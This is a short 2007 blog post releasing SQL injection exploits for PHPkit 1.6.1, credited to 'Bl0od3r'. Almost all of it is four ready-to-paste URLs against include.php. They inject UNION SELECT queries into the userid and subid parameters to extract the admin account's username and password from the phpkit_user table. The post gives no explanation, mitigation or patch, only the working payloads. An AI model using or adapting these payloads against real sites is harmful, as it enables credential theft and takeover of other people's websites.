Monday, 1 January 2007

PHPkit 1.6.1 Sql Injection

#PHPKIT 1.6.1 Sql Injection(s)
#Released by Bl0od3r
#http://tech-bl0od3r.blogspot.com/
#Status:Critical
#http://site.com/include.php?path=login/mailer.php&userid='-1+UNION+%20SELECT+2,user_pw,33,1%20FROM%20phpkit_user%20WHERE%20user_id=1/*
#http://site.com/include.php?path=login/mailer.php&userid='-1+UNION+%20SELECT+2,user_name,33,1%20FROM%20phpkit_user%20WHERE%20user_id=1/*
#http://site.com/include.php?path=comment/comment.php&comcat=gb&subid='UNION%20SELECT%201,1,1,1,1,1,user_name,1%20FROM%20phpkit_user%20WHERE%20user_id=1/*
#http://site.com/include.php?path=comment/comment.php&comcat=gb&subid='UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20FROM%20phpkit_user%20WHERE%20user_id=1/*

#eof
#released by Bl0od3r

No comments: